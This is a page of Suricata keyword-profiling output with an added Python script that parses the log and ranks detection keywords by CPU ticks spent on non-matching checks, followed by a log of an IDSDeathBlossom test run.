  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39496512        5474            3542            6937554         7215.00         5985.00         9469.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          58972130        9177            5957            339280          6426.00         6737.00         5849.00        
  pcre             5652374         644             644             426900          8776.00         8776.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4928550         805             805             326028          6122.00         6122.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1573940         322             0               21144           4888.00         0.00            4888.00        
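keyword_perf.log is Suricata's per-keyword profiling output: for each buffer (http_uri, http_header, and so on) it reports how many times a keyword was evaluated, how often it matched, and the average cost in CPU ticks for matches and non-matches. The useful derived number is the ticks spent on checks that did not match, (Checks - Matches) x Avg No Match, which is what a rule costs without ever producing an alert. The parser and ranking below are an added example, not part of the page or of Suricata. SAMPLE_PERF is a constructed excerpt with the same layout as the log above (only the total, http_uri, http_header and http_user_agent sections are reproduced). The consistency check assumes Avg is the integer division of Ticks by Checks, which is an inference from this table (every Avg ends in .00 and equals the floored quotient), not a documented guarantee.

```python
"""Parse Suricata's keyword_perf.log and rank detection keywords by wasted cost.

Added example, not part of the original page or of Suricata. SAMPLE_PERF is a
constructed excerpt with the same layout as the keyword_perf.log above.
"""
import re

SAMPLE_PERF = """\
  Date: 8/13/2019 -- 12:11:13
  Stats for: total
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- ---------------
  flow             244792612       40362           40362           4825588         6064.00         6064.00         0.00
  content          518442102       75518           51883           10692354        6865.00         6972.00         6629.00
  pcre             111064374       13203           3381            2284888         8412.00         9191.00         8143.00
  byte_test        384082          67              52              26896           5732.00         6003.00         4792.00
  byte_jump        92200           13              13              29150           7092.00         7092.00         0.00
  isdataat         9666            2               0               4868            4833.00         0.00            4833.00
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00
  Stats for: http_uri
  content          114106286       17066           12236           1047462         6686.00         6603.00         6894.00
  pcre             73534050        9177            1610            424932          8012.00         8181.00         7976.00
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00
  Stats for: http_header
  content          214742612       29624           24311           10692354        7248.00         7448.00         6335.00
  pcre             28069478        2898            966             2284888         9685.00         11019.00        9018.00
  Stats for: http_user_agent
  content          58972130        9177            5957            339280          6426.00         6737.00         5849.00
  pcre             5652374         644             644             426900          8776.00         8776.00         0.00
"""

SECTION = re.compile(r"^\s*Stats for:\s*(.+?)\s*$")
# keyword name, then four integer columns and three float columns; the
# "Keyword ..." header and the dashed rules do not match this shape
ROW = re.compile(r"^\s*([a-z_]+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+([\d.]+)\s+([\d.]+)\s+([\d.]+)\s*$")
FIELDS = ("ticks", "checks", "matches", "max_ticks", "avg", "avg_match", "avg_nomatch")

def parse_keyword_perf(text):
    """Return {section: [row, ...]}; a row holds the keyword and its seven columns."""
    sections, current = {}, None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            current = m.group(1)
            sections[current] = []
            continue
        m = ROW.match(line)
        if m and current is not None:
            kw, *cols = m.groups()
            row = {"keyword": kw}
            for name, val in zip(FIELDS, cols):
                row[name] = float(val) if "." in val else int(val)
            sections[current].append(row)
    return sections

def consistent(row):
    """Sanity check on a parsed row: Avg should be floor(Ticks / Checks), as observed
    in this log (assumption, inferred from the table rather than documented)."""
    if row["checks"] == 0:
        return row["avg"] == 0
    return 0 <= row["ticks"] / row["checks"] - row["avg"] < 1

def wasted_ticks(row):
    """Ticks spent on checks that failed to match: cost that bought no alert."""
    return (row["checks"] - row["matches"]) * row["avg_nomatch"]

def rank_by_waste(sections):
    """Per-buffer keywords ordered by wasted ticks; the 'total' roll-up is excluded."""
    rows = [(sec, r) for sec, rs in sections.items() if sec != "total" for r in rs]
    rows.sort(key=lambda sr: wasted_ticks(sr[1]), reverse=True)
    return [(sec, r["keyword"], int(wasted_ticks(r))) for sec, r in rows]

def share_of_total(sections):
    """Fraction of all keyword ticks attributed to each keyword type in 'total'."""
    total = sections["total"]
    all_ticks = sum(r["ticks"] for r in total)
    return {r["keyword"]: r["ticks"] / all_ticks for r in total}

if __name__ == "__main__":
    stats = parse_keyword_perf(SAMPLE_PERF)
    bad = [(s, r["keyword"]) for s, rs in stats.items() for r in rs if not consistent(r)]
    print("rows failing the Avg check:", bad)
    for sec, kw, waste in rank_by_waste(stats)[:5]:
        print(f"{sec:18} {kw:10} wasted ticks {waste:>12,}")
    for kw, frac in sorted(share_of_total(stats).items(), key=lambda kv: -kv[1]):
        print(f"{kw:10} {frac:6.1%} of keyword ticks")
```

On this log the ranking puts `pcre` and `urilen` on http_uri at the top: pcre on http_uri ran 9177 times and matched 1610, so about 60 million ticks went to non-matching checks, and urilen's 11431 checks with 4347 matches cost another 52 million. That is the signal to look for in a ruleset tuning pass: buffers where a keyword is evaluated often, matches rarely, and has no cheaper fast-pattern in front of it. The Avg check is there because the fixed-width columns are easy to mis-parse; a row that fails it usually means a column shifted.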


IDSDeathBlossom.py.log - (1204 bytes)
2019-08-13 12:10:45,763 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-08-13 12:10:46,568 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-08-13 12:10:46,568 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-08-13 12:10:46,569 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-08-13 12:10:46,569 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-08-13 12:10:46,569 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cf556455534924bd14168c1c670054f956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap -vvv -k none
2019-08-13 12:11:14,398 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-08-13 12:11:14,398 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 28.6444358826